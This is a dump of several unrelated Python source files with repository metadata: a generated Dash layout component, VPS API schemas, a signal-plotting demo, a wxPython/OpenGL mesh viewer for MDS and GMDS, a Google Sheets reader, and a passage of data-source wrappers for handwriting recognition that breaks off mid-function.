] | 4 | 2021-04-25T22:55:25.000Z | 2021-12-10T04:52:30.000Z | dash_carbon_components/Column.py | Matheus-Rangel/dash-carbon-components | e3f4aa4a8d649e2740db32677040f2548ef5da48 | [
"Apache-2.0"
] | null | null | null | dash_carbon_components/Column.py | Matheus-Rangel/dash-carbon-components | e3f4aa4a8d649e2740db32677040f2548ef5da48 | [
"Apache-2.0"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Column(Component):
"""A Column component.
Row Column
Keyword arguments:
- children (list of a list of or a singular dash component, string or numbers | a list of or a singular dash component, string or number; optional): The children of the element
- style (dict; optional): The inline styles
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- className (string; default ''): The class of the element
- columnSizes (list of strings; optional): The size of the column with the display size, sm-4, lg-16 ...
- offsetSizes (list of strings; optional): The size of the offset with the display size, lg-2 ..."""
@_explicitize_args
def __init__(self, children=None, style=Component.UNDEFINED, id=Component.UNDEFINED, className=Component.UNDEFINED, columnSizes=Component.UNDEFINED, offsetSizes=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'style', 'id', 'className', 'columnSizes', 'offsetSizes']
self._type = 'Column'
self._namespace = 'dash_carbon_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'style', 'id', 'className', 'columnSizes', 'offsetSizes']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Column, self).__init__(children=children, **args)
| 49.894737 | 196 | 0.681962 | 239 | 1,896 | 5.267782 | 0.39749 | 0.023828 | 0.01112 | 0.014297 | 0.193805 | 0.193805 | 0.193805 | 0.114376 | 0.061954 | 0.061954 | 0 | 0.002686 | 0.214662 | 1,896 | 37 | 197 | 51.243243 | 0.842848 | 0.396097 | 0 | 0 | 1 | 0 | 0.159051 | 0.019332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
913e527c83f21ed4118adbad50f5935916d3a9fa | 2,221 | py | Python | src/backend/schemas/vps.py | ddddhm1/LuWu | f9feaf10a6aca0dd31f250741a1c542ee5256633 | [
"Apache-2.0"
] | 658 | 2019-04-29T02:46:02.000Z | 2022-03-30T03:58:42.000Z | src/backend/schemas/vps.py | ddddhm1/LuWu | f9feaf10a6aca0dd31f250741a1c542ee5256633 | [
"Apache-2.0"
] | 9 | 2020-06-04T13:38:58.000Z | 2022-02-27T21:23:29.000Z | src/backend/schemas/vps.py | ddddhm1/LuWu | f9feaf10a6aca0dd31f250741a1c542ee5256633 | [
"Apache-2.0"
] | 130 | 2019-05-02T23:42:58.000Z | 2022-03-24T04:35:37.000Z | from typing import List
from typing import Optional
from typing import Union
from models.vps import VpsStatus
from schemas.base import APIModel
from schemas.base import BasePagination
from schemas.base import BaseSchema
from schemas.base import BaseSuccessfulResponseModel
class VpsSshKeySchema(APIModel):
name: str
public_key: str = None
private_key: str = None
isp_id: int
ssh_key_id: Optional[str]
date_created: Optional[str]
fingerprint: Optional[str]
class VpsSpecPlanSchema(APIModel):
name: str
plan_code: Union[str, int]
region_codes: List = None
bandwidth: float
ram: int
vcpu: int
disk: int
price_monthly: Union[float, int, str] = None
price_hourly: Union[float, int, str] = None
price_yearly: Union[float, int, str] = None
class VpsSpecRegionSchema(APIModel):
name: str
region_code: Union[str, int]
features: List[str] = None
plan_codes: List[Union[str, int]] = []
class VpsSpecOsSchema(APIModel):
name: str
os_code: Union[str, int]
region_codes: List[Union[str, int]] = []
plan_codes: List[Union[str, int]] = []
class VpsSpecSchema(APIModel):
region: List[VpsSpecRegionSchema] = []
plan: List[VpsSpecPlanSchema] = []
os: List[VpsSpecOsSchema] = []
class VpsSpecResponse(BaseSuccessfulResponseModel):
result: VpsSpecSchema
class VpsCreateSchema(APIModel):
hostname: str
isp_id: int
region_code: str
os_code: str
plan_code: str
ssh_keys: List[str] = []
status: int = VpsStatus.init
remark: str = None
class VpsItemSchema(BaseSchema):
isp_id: int
ip: Union[int, str, None]
server_id: Optional[str]
hostname: str
os: Optional[str]
plan: Optional[str]
region: Optional[str]
status: int
status_name: str
status_msg: Optional[str]
isp_provider_name: str
class VpsItemResponse(BaseSuccessfulResponseModel):
result: VpsItemSchema
class VpsPaginationSchema(BasePagination):
items: Optional[List[VpsItemSchema]]
class VpsPaginationResponse(BaseSuccessfulResponseModel):
result: VpsPaginationSchema
class VpsSshKeyResponseSchema(BaseSuccessfulResponseModel):
result: List[VpsSshKeySchema]
| 22.663265 | 59 | 0.714093 | 257 | 2,221 | 6.066148 | 0.2607 | 0.03592 | 0.042335 | 0.053881 | 0.127646 | 0.107761 | 0.07569 | 0 | 0 | 0 | 0 | 0 | 0.197659 | 2,221 | 97 | 60 | 22.896907 | 0.87486 | 0 | 0 | 0.152778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 1 | 0.013889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
913effe79b3a41e71c6774354a20673cc5bf2cf7 | 672 | py | Python | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | import sigplot as sp
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
matplotlib.rcParams['toolbar'] = 'None'
plt.style.use('dark_background')
fig = plt.figure()
# seed = np.linspace(3, 7, 1000)
# a = (np.sin(2 * np.pi * seed))
# b = (np.cos(2 * np.pi * seed))
# sp.correlate(fig, b, a, 300)
t = np.linspace(0, 1, 500)
b = (np.cos(2 * np.pi * t))
# x = np.concatenate([np.zeros(500), signal.sawtooth(2 * np.pi * 5 * t), np.zeros(500), np.ones(120), np.zeros(500)])
x = np.concatenate([np.zeros(500), np.ones(500), np.zeros(500)])
sp.fourier_series(fig, x, 100, 200, 200)
plt.show()
# WriteToVideo("twoPulse.mp4", anim);
| 25.846154 | 118 | 0.623512 | 114 | 672 | 3.657895 | 0.45614 | 0.083933 | 0.119904 | 0.043165 | 0.220624 | 0.167866 | 0 | 0 | 0 | 0 | 0 | 0.09058 | 0.178571 | 672 | 25 | 119 | 26.88 | 0.664855 | 0.40625 | 0 | 0 | 0 | 0 | 0.070845 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9143774e616443b37cd584d3970647098c72f10f | 16,563 | py | Python | testGMDS.py | ctralie/SiRPyGL | e06c317ed60321d492725e39fd8fcc0ce56ff4c0 | [
"Apache-2.0"
] | 7 | 2017-10-06T05:33:28.000Z | 2021-04-20T20:06:53.000Z | testGMDS.py | ctralie/SiRPyGL | e06c317ed60321d492725e39fd8fcc0ce56ff4c0 | [
"Apache-2.0"
] | null | null | null | testGMDS.py | ctralie/SiRPyGL | e06c317ed60321d492725e39fd8fcc0ce56ff4c0 | [
"Apache-2.0"
] | 4 | 2015-03-20T13:14:36.000Z | 2019-04-19T10:34:51.000Z | #Based off of http://wiki.wxpython.org/GLCanvas
#Lots of help from http://wiki.wxpython.org/Getting%20Started
from OpenGL.GL import *
import wx
from wx import glcanvas
from Primitives3D import *
from PolyMesh import *
from LaplacianMesh import *
from Geodesics import *
from PointCloud import *
from Cameras3D import *
from ICP import *
from sys import exit, argv
import random
import numpy as np
import scipy.io as sio
from pylab import cm
import os
import subprocess
import math
import time
#from sklearn import manifold
from GMDS import *
DEFAULT_SIZE = wx.Size(1200, 800)
DEFAULT_POS = wx.Point(10, 10)
PRINCIPAL_AXES_SCALEFACTOR = 1
def saveImageGL(mvcanvas, filename):
view = glGetIntegerv(GL_VIEWPORT)
img = wx.EmptyImage(view[2], view[3] )
pixels = glReadPixels(0, 0, view[2], view[3], GL_RGB,
GL_UNSIGNED_BYTE)
img.SetData( pixels )
img = img.Mirror(False)
img.SaveFile(filename, wx.BITMAP_TYPE_PNG)
def saveImage(canvas, filename):
s = wx.ScreenDC()
w, h = canvas.size.Get()
b = wx.EmptyBitmap(w, h)
m = wx.MemoryDCFromDC(s)
m.SelectObject(b)
m.Blit(0, 0, w, h, s, 70, 0)
m.SelectObject(wx.NullBitmap)
b.SaveFile(filename, wx.BITMAP_TYPE_PNG)
class MeshViewerCanvas(glcanvas.GLCanvas):
def __init__(self, parent):
attribs = (glcanvas.WX_GL_RGBA, glcanvas.WX_GL_DOUBLEBUFFER, glcanvas.WX_GL_DEPTH_SIZE, 24)
glcanvas.GLCanvas.__init__(self, parent, -1, attribList = attribs)
self.context = glcanvas.GLContext(self)
self.parent = parent
#Camera state variables
self.size = self.GetClientSize()
#self.camera = MouseSphericalCamera(self.size.x, self.size.y)
self.camera = MousePolarCamera(self.size.width, self.size.height)
#Main state variables
self.MousePos = [0, 0]
self.initiallyResized = False
self.bbox = BBox3D()
self.unionbbox = BBox3D()
random.seed()
#Face mesh variables and manipulation variables
self.mesh1 = None
self.mesh1Dist = None
self.mesh1DistLoaded = False
self.mesh2 = None
self.mesh2DistLoaded = False
self.mesh2Dist = None
self.mesh3 = None
#Holds the transformations of the best iteration in ICP
self.transformations = []
self.savingMovie = False
self.movieIter = 0
self.displayMeshFaces = True
self.displayMeshEdges = False
self.displayMeshVertices = False
self.displayMeshNormals = False
self.displayPrincipalAxes = False
self.vertexColors = np.zeros(0)
self.cutPlane = None
self.displayCutPlane = False
self.GLinitialized = False
#GL-related events
wx.EVT_ERASE_BACKGROUND(self, self.processEraseBackgroundEvent)
wx.EVT_SIZE(self, self.processSizeEvent)
wx.EVT_PAINT(self, self.processPaintEvent)
#Mouse Events
wx.EVT_LEFT_DOWN(self, self.MouseDown)
wx.EVT_LEFT_UP(self, self.MouseUp)
wx.EVT_RIGHT_DOWN(self, self.MouseDown)
wx.EVT_RIGHT_UP(self, self.MouseUp)
wx.EVT_MIDDLE_DOWN(self, self.MouseDown)
wx.EVT_MIDDLE_UP(self, self.MouseUp)
wx.EVT_MOTION(self, self.MouseMotion)
#self.initGL()
def initPointCloud(self, pointCloud):
self.pointCloud = pointCloud
def centerOnMesh1(self, evt):
if not self.mesh1:
return
self.bbox = self.mesh1.getBBox()
self.camera.centerOnBBox(self.bbox, theta = -math.pi/2, phi = math.pi/2)
self.Refresh()
def centerOnMesh2(self, evt):
if not self.mesh2:
return
self.bbox = self.mesh2.getBBox()
self.camera.centerOnBBox(self.bbox, theta = -math.pi/2, phi = math.pi/2)
self.Refresh()
def centerOnBoth(self, evt):
if not self.mesh1 or not self.mesh2:
return
self.bbox = self.mesh1.getBBox()
self.bbox.Union(self.mesh2.getBBox())
self.camera.centerOnBBox(self.bbox, theta = -math.pi/2, phi = math.pi/2)
self.Refresh()
def MDSMesh1(self, evt):
if not self.mesh1:
print "ERROR: Mesh 1 not loaded yet"
return
if not self.mesh1DistLoaded:
print "ERROR: Mesh 1 distance matrix not loaded"
return
mds = manifold.MDS(n_components=2, dissimilarity="precomputed", n_jobs=1)
print "Doing MDS on mesh 1...."
pos = mds.fit(self.mesh1Dist).embedding_
print "Finished MDS on mesh 1"
for i in range(pos.shape[0]):
self.mesh1.vertices[i].pos = Point3D(pos[i, 0], pos[i, 1], pos[i, 2])
self.mesh1.needsDisplayUpdate = True
self.Refresh()
def MDSMesh2(self, evt):
if not self.mesh2:
print "ERROR: Mesh 2 not loaded yet"
return
if not self.mesh2DistLoaded:
print "ERROR: Mesh 2 distance matrix not loaded"
return
mds = manifold.MDS(n_components=2, dissimilarity="precomputed", n_jobs=1)
print "Doing MDS on mesh 2..."
pos = mds.fit(self.mesh2Dist).embedding_
print "Finished MDS on mesh 2"
for i in range(pos.shape[0]):
self.mesh2.vertices[i].pos = Point3D(pos[i, 0], pos[i, 1], pos[i, 2])
self.mesh2.needsDisplayUpdate = True
self.Refresh()
def doGMDS(self, evt):
if self.mesh1 and self.mesh2:
if not self.mesh1DistLoaded:
print "Mesh 1 distance not loaded"
return
if not self.mesh2DistLoaded:
print "Mesh 2 distance not loaded"
return
N = len(self.mesh1.vertices)
VX = np.zeros((N, 3))
for i in range(N):
V = self.mesh1.vertices[i].pos
VX[i, :] = np.array([V.x, V.y, V.z])
print "Doing GMDS..."
t, u = GMDSPointsToMesh(VX, self.mesh1Dist, self.mesh2, self.mesh2Dist)
print "Finished GMDS"
#Update the vertices based on the triangles where they landed
#and the barycentric coordinates of those triangles
for i in range(N):
Vs = [v.pos for v in self.mesh2.faces[int(t[i].flatten()[0])].getVertices()]
pos = Point3D(0, 0, 0)
for k in range(3):
pos = pos + u[i, k]*Vs[k]
self.mesh1.vertices[i].pos = pos
self.mesh1.needsDisplayUpdate = True
else:
print "ERROR: One or both meshes have not been loaded yet"
self.Refresh()
def displayMeshFacesCheckbox(self, evt):
self.displayMeshFaces = evt.Checked()
self.Refresh()
def displayMeshEdgesCheckbox(self, evt):
self.displayMeshEdges = evt.Checked()
self.Refresh()
def displayCutPlaneCheckbox(self, evt):
self.displayCutPlane = evt.Checked()
self.Refresh()
def displayMeshVerticesCheckbox(self, evt):
self.displayMeshVertices = evt.Checked()
self.Refresh()
def displayPrincipalAxesCheckbox(self, evt):
self.displayPrincipalAxes = evt.Checked()
self.Refresh()
def processEraseBackgroundEvent(self, event): pass #avoid flashing on MSW.
def processSizeEvent(self, event):
self.size = self.GetClientSize()
self.SetCurrent(self.context)
glViewport(0, 0, self.size.width, self.size.height)
if not self.initiallyResized:
#The canvas gets resized once on initialization so the camera needs
#to be updated accordingly at that point
self.camera = MousePolarCamera(self.size.width, self.size.height)
self.camera.centerOnBBox(self.bbox, math.pi/2, math.pi/2)
self.initiallyResized = True
def processPaintEvent(self, event):
dc = wx.PaintDC(self)
self.SetCurrent(self.context)
if not self.GLinitialized:
self.initGL()
self.GLinitialized = True
self.repaint()
def repaint(self):
#Set up projection matrix
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
farDist = (self.camera.eye - self.bbox.getCenter()).Length()*2
#This is to make sure we can see on the inside
farDist = max(farDist, self.unionbbox.getDiagLength()*2)
nearDist = farDist/50.0
gluPerspective(180.0*self.camera.yfov/M_PI, float(self.size.x)/self.size.y, nearDist, farDist)
#Set up modelview matrix
self.camera.gotoCameraFrame()
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLightfv(GL_LIGHT0, GL_POSITION, [3.0, 4.0, 5.0, 0.0]);
glLightfv(GL_LIGHT1, GL_POSITION, [-3.0, -2.0, -3.0, 0.0]);
glEnable(GL_LIGHTING)
glMaterialfv(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE, [0.8, 0.8, 0.8, 1.0]);
glMaterialfv(GL_FRONT_AND_BACK, GL_SPECULAR, [0.2, 0.2, 0.2, 1.0])
glMaterialfv(GL_FRONT_AND_BACK, GL_SHININESS, 64)
if self.mesh1:
self.mesh1.renderGL(True, True, False, False, None)
if self.mesh2:
self.mesh2.renderGL(self.displayMeshEdges, self.displayMeshVertices, self.displayMeshNormals, self.displayMeshFaces, None)
self.SwapBuffers()
def initGL(self):
glLightModelfv(GL_LIGHT_MODEL_AMBIENT, [0.2, 0.2, 0.2, 1.0])
glLightModeli(GL_LIGHT_MODEL_LOCAL_VIEWER, GL_TRUE)
glLightfv(GL_LIGHT0, GL_DIFFUSE, [1.0, 1.0, 1.0, 1.0])
glEnable(GL_LIGHT0)
glLightfv(GL_LIGHT1, GL_DIFFUSE, [0.5, 0.5, 0.5, 1.0])
glEnable(GL_LIGHT1)
glEnable(GL_NORMALIZE)
glEnable(GL_LIGHTING)
glEnable(GL_DEPTH_TEST)
def handleMouseStuff(self, x, y):
#Invert y from what the window manager says
y = self.size.height - y
self.MousePos = [x, y]
def MouseDown(self, evt):
x, y = evt.GetPosition()
self.CaptureMouse()
self.handleMouseStuff(x, y)
self.Refresh()
def MouseUp(self, evt):
x, y = evt.GetPosition()
self.handleMouseStuff(x, y)
self.ReleaseMouse()
self.Refresh()
def MouseMotion(self, evt):
x, y = evt.GetPosition()
[lastX, lastY] = self.MousePos
self.handleMouseStuff(x, y)
dX = self.MousePos[0] - lastX
dY = self.MousePos[1] - lastY
if evt.Dragging():
if evt.MiddleIsDown():
self.camera.translate(dX, dY)
elif evt.RightIsDown():
self.camera.zoom(-dY)#Want to zoom in as the mouse goes up
elif evt.LeftIsDown():
self.camera.orbitLeftRight(dX)
self.camera.orbitUpDown(dY)
self.Refresh()
class MeshViewerFrame(wx.Frame):
(ID_LOADDATASET1, ID_LOADDATASET2, ID_SAVEDATASET, ID_SAVESCREENSHOT) = (1, 2, 3, 4)
def __init__(self, parent, id, title, pos=DEFAULT_POS, size=DEFAULT_SIZE, style=wx.DEFAULT_FRAME_STYLE, name = 'GLWindow', mesh1 = None, mesh2 = None):
style = style | wx.NO_FULL_REPAINT_ON_RESIZE
super(MeshViewerFrame, self).__init__(parent, id, title, pos, size, style, name)
#Initialize the menu
self.CreateStatusBar()
self.size = size
self.pos = pos
print "MeshViewerFrameSize = %s, pos = %s"%(self.size, self.pos)
filemenu = wx.Menu()
menuOpenMesh1 = filemenu.Append(MeshViewerFrame.ID_LOADDATASET1, "&Load Mesh1","Load a polygon mesh")
self.Bind(wx.EVT_MENU, self.OnLoadMesh1, menuOpenMesh1)
menuOpenMesh2 = filemenu.Append(MeshViewerFrame.ID_LOADDATASET2, "&Load Mesh2","Load a polygon mesh")
self.Bind(wx.EVT_MENU, self.OnLoadMesh2, menuOpenMesh2)
menuSaveScreenshot = filemenu.Append(MeshViewerFrame.ID_SAVESCREENSHOT, "&Save Screenshot", "Save a screenshot of the GL Canvas")
self.Bind(wx.EVT_MENU, self.OnSaveScreenshot, menuSaveScreenshot)
menuExit = filemenu.Append(wx.ID_EXIT,"E&xit"," Terminate the program")
self.Bind(wx.EVT_MENU, self.OnExit, menuExit)
# Creating the menubar.
menuBar = wx.MenuBar()
menuBar.Append(filemenu,"&File") # Adding the "filemenu" to the MenuBar
self.SetMenuBar(menuBar) # Adding the MenuBar to the Frame content.
self.glcanvas = MeshViewerCanvas(self)
self.glcanvas.mesh1 = None
self.glcanvas.mesh2 = None
if mesh1:
(self.glcanvas.mesh1, self.glcanvas.mesh1Dist) = self.loadMesh(mesh1)
if self.glcanvas.mesh1Dist.shape[0] > 0:
self.glcanvas.mesh1DistLoaded = True
else:
self.glcanvas.mesh1DistLoaded = False
if mesh2:
(self.glcanvas.mesh2, self.glcanvas.mesh2Dist) = self.loadMesh(mesh2)
if self.glcanvas.mesh2Dist.shape[0] > 0:
self.glcanvas.mesh2DistLoaded = True
else:
self.glcanvas.mesh2DistLoaded = False
self.rightPanel = wx.BoxSizer(wx.VERTICAL)
#Buttons to go to a default view
viewPanel = wx.BoxSizer(wx.HORIZONTAL)
center1Button = wx.Button(self, -1, "Mesh1")
self.Bind(wx.EVT_BUTTON, self.glcanvas.centerOnMesh1, center1Button)
viewPanel.Add(center1Button, 0, wx.EXPAND)
center2Button = wx.Button(self, -1, "Mesh2")
self.Bind(wx.EVT_BUTTON, self.glcanvas.centerOnMesh2, center2Button)
viewPanel.Add(center2Button, 0, wx.EXPAND)
bothButton = wx.Button(self, -1, "Both")
self.Bind(wx.EVT_BUTTON, self.glcanvas.centerOnBoth, bothButton)
viewPanel.Add(bothButton, 0, wx.EXPAND)
self.rightPanel.Add(wx.StaticText(self, label="Views"), 0, wx.EXPAND)
self.rightPanel.Add(viewPanel, 0, wx.EXPAND)
#Buttons for MDS
MDSPanel = wx.BoxSizer(wx.HORIZONTAL)
MDS1Button = wx.Button(self, -1, "MDS Mesh1")
self.Bind(wx.EVT_BUTTON, self.glcanvas.MDSMesh1, MDS1Button)
MDSPanel.Add(MDS1Button, 0, wx.EXPAND)
MDS2Button = wx.Button(self, -1, "MDS Mesh2")
self.Bind(wx.EVT_BUTTON, self.glcanvas.MDSMesh2, MDS2Button)
MDSPanel.Add(MDS2Button, 0, wx.EXPAND)
self.rightPanel.Add(wx.StaticText(self, label="MDS on Meshes"), 0, wx.EXPAND)
self.rightPanel.Add(MDSPanel, 0, wx.EXPAND)
#Checkboxes for displaying data
self.displayMeshFacesCheckbox = wx.CheckBox(self, label = "Display Mesh Faces")
self.displayMeshFacesCheckbox.SetValue(True)
self.Bind(wx.EVT_CHECKBOX, self.glcanvas.displayMeshFacesCheckbox, self.displayMeshFacesCheckbox)
self.rightPanel.Add(self.displayMeshFacesCheckbox, 0, wx.EXPAND)
self.displayMeshEdgesCheckbox = wx.CheckBox(self, label = "Display Mesh Edges")
self.displayMeshEdgesCheckbox.SetValue(False)
self.Bind(wx.EVT_CHECKBOX, self.glcanvas.displayMeshEdgesCheckbox, self.displayMeshEdgesCheckbox)
self.rightPanel.Add(self.displayMeshEdgesCheckbox, 0, wx.EXPAND)
self.displayMeshVerticesCheckbox = wx.CheckBox(self, label = "Display Mesh Points")
self.displayMeshVerticesCheckbox.SetValue(False)
self.Bind(wx.EVT_CHECKBOX, self.glcanvas.displayMeshVerticesCheckbox, self.displayMeshVerticesCheckbox)
self.rightPanel.Add(self.displayMeshVerticesCheckbox)
#Button for doing ICP
GMDSButton = wx.Button(self, -1, "DO GMDS")
self.Bind(wx.EVT_BUTTON, self.glcanvas.doGMDS, GMDSButton)
self.rightPanel.Add(GMDSButton, 0, wx.EXPAND)
#Finally add the two main panels to the sizer
self.sizer = wx.BoxSizer(wx.HORIZONTAL)
self.sizer.Add(self.glcanvas, 2, wx.EXPAND)
self.sizer.Add(self.rightPanel, 0, wx.EXPAND)
self.SetSizer(self.sizer)
self.Layout()
self.Show()
def loadMesh(self, filepath):
print "Loading mesh %s..."%filepath
mesh = LaplacianMesh()
mesh.loadFile(filepath)
print "Finished loading mesh 1\n %s"%mesh
#Now try to load in the distance matrix
fileName, fileExtension = os.path.splitext(filepath)
matfile = sio.loadmat("%s.mat"%fileName)
D = np.array([])
if 'D' in matfile:
D = matfile['D']
else:
print "ERROR: No distance matrix found for mesh %s"%filepath
return (mesh, D)
def OnLoadMesh1(self, evt):
dlg = wx.FileDialog(self, "Choose a file", ".", "", "OBJ files (*.obj)|*.obj|OFF files (*.off)|*.off", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetFilename()
dirname = dlg.GetDirectory()
filepath = os.path.join(dirname, filename)
print dirname
(self.glcanvas.mesh1, self.glcanvas.mesh1Dist) = self.loadMesh(filepath)
self.glcanvas.bbox = self.glcanvas.mesh1.getBBox()
print "Mesh BBox: %s\n"%self.glcanvas.bbox
self.glcanvas.camera.centerOnBBox(self.glcanvas.bbox, theta = -math.pi/2, phi = math.pi/2)
#Now try to load in the distance matrix
if self.glcanvas.mesh1Dist.shape[0] > 0:
self.glcanvas.mesh1DistLoaded = True
self.glcanvas.Refresh()
dlg.Destroy()
return
def OnLoadMesh2(self, evt):
dlg = wx.FileDialog(self, "Choose a file", ".", "", "OBJ files (*.obj)|*.obj|OFF files (*.off)|*.off", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetFilename()
dirname = dlg.GetDirectory()
filepath = os.path.join(dirname, filename)
print dirname
(self.glcanvas.mesh2, self.glcanvas.mesh2Dist) = self.loadMesh(filepath)
self.glcanvas.bbox = self.glcanvas.mesh2.getBBox()
print "Mesh BBox: %s\n"%self.glcanvas.bbox
self.glcanvas.camera.centerOnBBox(self.glcanvas.bbox, theta = -math.pi/2, phi = math.pi/2)
#Now try to load in the distance matrix
if self.glcanvas.mesh2Dist.shape[0] > 0:
self.glcanvas.mesh2DistLoaded = True
self.glcanvas.Refresh()
dlg.Destroy()
return
def OnSaveScreenshot(self, evt):
dlg = wx.FileDialog(self, "Choose a file", ".", "", "*", wx.SAVE)
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetFilename()
dirname = dlg.GetDirectory()
filepath = os.path.join(dirname, filename)
saveImageGL(self.glcanvas, filepath)
dlg.Destroy()
return
def OnExit(self, evt):
self.Close(True)
return
class MeshViewer(object):
def __init__(self, m1 = None, m2 = None):
app = wx.App()
frame = MeshViewerFrame(None, -1, 'MeshViewer', mesh1 = m1, mesh2 = m2)
frame.Show(True)
app.MainLoop()
app.Destroy()
if __name__ == '__main__':
m1 = None
m2 = None
if len(argv) >= 3:
m1 = argv[1]
m2 = argv[2]
viewer = MeshViewer(m1, m2)
| 34.010267 | 152 | 0.71871 | 2,321 | 16,563 | 5.065489 | 0.202068 | 0.044909 | 0.01548 | 0.014374 | 0.344646 | 0.303819 | 0.242409 | 0.216382 | 0.163562 | 0.143574 | 0 | 0.022834 | 0.153897 | 16,563 | 486 | 153 | 34.080247 | 0.816112 | 0.070036 | 0 | 0.24812 | 0 | 0 | 0.062004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002506 | 0.050125 | null | null | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9143b8c633adb2c76477406a889fd2a426c5cda8 | 278 | py | Python | gigamonkeys/get.py | gigamonkey/sheets | a89e76360ad9a35e44e5e352346eeccbe6952b1f | [
"BSD-3-Clause"
] | null | null | null | gigamonkeys/get.py | gigamonkey/sheets | a89e76360ad9a35e44e5e352346eeccbe6952b1f | [
"BSD-3-Clause"
] | 1 | 2021-04-03T23:07:35.000Z | 2021-04-03T23:07:35.000Z | gigamonkeys/get.py | gigamonkey/sheets | a89e76360ad9a35e44e5e352346eeccbe6952b1f | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import json
import sys
from gigamonkeys.spreadsheets import spreadsheets
spreadsheet_id = sys.argv[1]
ranges = sys.argv[2:]
data = spreadsheets().get(spreadsheet_id, include_grid_data=bool(ranges), ranges=ranges)
json.dump(data, sys.stdout, indent=2)
| 19.857143 | 88 | 0.773381 | 41 | 278 | 5.146341 | 0.585366 | 0.123223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012048 | 0.104317 | 278 | 13 | 89 | 21.384615 | 0.835341 | 0.071942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9146c7949d8b05d057e0f629fb324a047f0358c0 | 6,145 | py | Python | sources/wrappers.py | X-rayLaser/keras-auto-hwr | 67cfc0209045b1e211f0491b0199cb9d6811bfd0 | [
"MIT"
] | null | null | null | sources/wrappers.py | X-rayLaser/keras-auto-hwr | 67cfc0209045b1e211f0491b0199cb9d6811bfd0 | [
"MIT"
] | 2 | 2020-01-04T09:03:31.000Z | 2021-05-10T18:29:41.000Z | sources/wrappers.py | X-rayLaser/keras-auto-hwr | 67cfc0209045b1e211f0491b0199cb9d6811bfd0 | [
"MIT"
] | null | null | null | import numpy as np
from sources import BaseSource
from sources.base import BaseSourceWrapper
from sources.preloaded import PreLoadedSource
import json
class WordsSource(BaseSource):
def __init__(self, source):
self._source = source
def __len__(self):
return len(self._source)
def _remove_apostrpohs(self, seq):
res = ''.join(seq.split('''))
res = ''.join(res.split('"'))
return res
def _clean(self, seq):
s = ''
for ch in seq.strip():
if ch.isalpha():
s += ch
return s
def get_sequences(self):
for seq_in, transcription in self._source.get_sequences():
transcription = self._remove_apostrpohs(transcription)
words = [self._clean(word) for word in transcription.split(' ')]
yield seq_in, words
class LabelSource(BaseSource):
def __init__(self, source, mapping_table):
self._source = source
self._mapping_table = mapping_table
def __len__(self):
return len(self._source)
def get_sequences(self):
for seq_in, seq_out in self._source.get_sequences():
label_seq = [self._mapping_table.encode(ch) for ch in seq_out]
yield seq_in, label_seq
class CTCAdaptedSource(BaseSource):
def __init__(self, source, padding_value=0):
self._source = source
self._padding = padding_value
def __len__(self):
return len(self._source)
def get_sequences(self):
for seq_in, seq_out in self._source.get_sequences():
